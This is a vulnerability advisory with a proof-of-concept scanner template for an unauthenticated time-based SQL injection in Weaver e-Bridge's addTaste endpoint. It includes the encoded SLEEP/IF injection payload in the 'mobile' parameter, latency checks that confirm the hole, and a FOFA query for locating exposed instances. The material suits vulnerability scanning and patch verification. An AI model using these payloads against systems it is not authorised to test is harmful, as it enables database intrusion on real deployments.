weaver-ebridge-addTasteJsonp-sqli: Weaver e-Bridge addTasteJsonp SQL Injection

日期: 2025-09-01 | 影响软件: Weaver e-Bridge | POC: 已公开

漏洞描述

Weaver e-Bridge system addTasteJsonp interface exists SQL injection vulnerability. Unauthenticated attackers can exploit SQL injection vulnerabilities to obtain information in the database. FOFA: app="泛微云桥e-Bridge"

PoC代码[已公开]

id: weaver-ebridge-addTasteJsonp-sqli
info:
  name: Weaver e-Bridge addTasteJsonp SQL Injection
  author: ZacharyZcR
  severity: critical
  verified: true
  description: |
    Weaver e-Bridge system addTasteJsonp interface exists SQL injection vulnerability.
    Unauthenticated attackers can exploit SQL injection vulnerabilities to obtain information in the database.
    FOFA: app="泛微云桥e-Bridge"
  reference:
    - https://mp.weixin.qq.com/s/Ej26hywx4po4sj3dSAVI_Q
  tags: ecology,ebridge,sqli
  created: 2024/12/30

rules:
  r0:
    request:
      method: GET
      path: /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27+AND+%28SELECT+8094+FROM+%28SELECT%28SLEEP%2810-%28IF%2818015%3E3469%2C0%2C4%29%29%29%29%29mKjk%29+OR+%27KQZm%27%3D%27REcX
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"msg":') &&
      response.latency <= 12000 &&  
      response.latency >= 10000
  r1:
    request:
      method: GET
      path: /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27+AND+%28SELECT+8094+FROM+%28SELECT%28SLEEP%286-%28IF%2818015%3E3469%2C0%2C4%29%29%29%29%29mKjk%29+OR+%27KQZm%27%3D%27REcX
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"msg":') &&
      response.latency <= 8000 &&  
      response.latency >= 6000
  r2:
    request:
      method: GET
      path: /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27+AND+%28SELECT+8094+FROM+%28SELECT%28SLEEP%2810-%28IF%2818015%3E3469%2C0%2C4%29%29%29%29%29mKjk%29+OR+%27KQZm%27%3D%27REcX
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"msg":') &&
      response.latency <= 12000 &&  
      response.latency >= 10000
  r3:
    request:
      method: GET
      path: /taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1%27+AND+%28SELECT+8094+FROM+%28SELECT%28SLEEP%286-%28IF%2818015%3E3469%2C0%2C4%29%29%29%29%29mKjk%29+OR+%27KQZm%27%3D%27REcX
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"msg":') &&
      response.latency <= 8000 &&  
      response.latency >= 6000

expression: r0() && r1() && r2() && r3()